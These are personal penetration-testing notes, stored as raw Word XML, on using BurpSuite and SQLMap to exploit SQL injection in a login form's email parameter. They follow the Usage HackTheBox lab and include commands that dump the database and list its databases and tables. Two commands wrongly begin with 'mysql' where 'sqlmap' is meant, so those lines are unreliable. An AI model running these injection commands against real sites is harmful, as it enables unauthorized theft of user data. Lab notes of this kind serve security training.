      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use SQLMap if you are at a login page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First use BurpSuite. Go to the log in page, put a value in for username and password, intercept the POST request, save it to a file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (right click the request and click on "Save Item")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once you have it saved (ex. request.txt), run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001870">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dbms=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dump </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR mysql -r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dbms=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001872">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses the intercepted request you saved earlier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001873">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells SQLMap what type of database management system it is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attempts to outputs the entire database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BATCH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used when you want to skip all the prompts to default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001876">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It defaults to "yes" for the simple ones and "no" for dangerous ones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001877">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">email </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--batch --level 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001878">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the command they used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. They didn't know the dbms, so they left it out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001879">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parameter to specify the parameter you want to target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And when they left out the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --level 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we see that we get numerous 500 and 503 responses, and no injection method is identified by sqlmap. The tool itself suggests using a higher --level and/or --risk , so we try setting a higher level to try a wider range of tests, since we know that the parameter is vulnerable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can use the terminal only, but BurpSuite helps with the process since you will need to know the exact structure of the username and password format to set the variables. So, just use the Burpsuite method, even though it is a little bit annoying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap will send all your results to "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/.local/share/sqlmap/output/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usage.htb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usage.htb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the name for the specific example I'm in. But that will change for you. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000187F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001880">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to enumerate the databases after SQLMap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001881">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Usage HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r request.txt -p email --batch --level 3 --dbs --threads=10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001883">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the same exact command as before but we just added the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs --threads=10 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flags. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001884">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag tells mysql to get a list of the available database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001885">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--threads=10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is just to tell it to go faster</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001886">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Near the end of the output, you should see something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001887">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2066925" cy="695325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="473" name="image449.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image449.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId508"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2066925" cy="695325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001888">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r request.txt -p email --batch --level 3 -D </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usage_blog</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --tables --threads=10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001889">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see one non-default database, namely usage_blog . We proceed to enumerate its tables, using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000188A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
